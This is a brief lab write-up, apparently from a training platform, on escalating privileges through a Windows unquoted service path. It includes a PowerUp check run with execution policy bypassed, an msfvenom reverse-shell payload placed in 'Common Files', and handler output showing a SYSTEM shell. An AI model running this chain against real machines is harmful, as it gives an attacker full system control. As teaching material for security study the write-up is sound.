If the path to start a service is not quoted off(encapsulated in quotes) then it is possible to add our own service inbetween the spaces in the path and have it execute. For example: if a service has a path of C:\Program Files\My Service\myservice.exe and not a path of “C:\Program Files\My Service\myservice.exe“ then the service will first look for C:\Program.exe and then C:\Program Files.exe and then C:\Program Files\My.exe and on and on until it gets to myservice.exe. Having quotes around the path prevents this entirely as the entire path is encapsulated in between quotes.
Powerup will display services with unquoted paths
powershell -ep bypass . .\Powerup.ps1 Invoke-AllChecks
The “Common Files” folder is writeable to everyone and has a space so we can create a payload named “Common.exe” and put it into the “Common Files” folder.
msfvenom -p windows/reverse_tcp LHOST=10.4.26.4 LPORT=5555 -f exe > Common.exe
Start the service
sc start unquotedsvc
msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.4.26.4:5555 [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.10.159.221 [*] Command shell session 1 opened (10.4.26.4:5555 -> 10.10.159.221:49218) at 2021-10-18 00:18:07 -0400 C:\Windows\system32>whoami whoami nt authority\system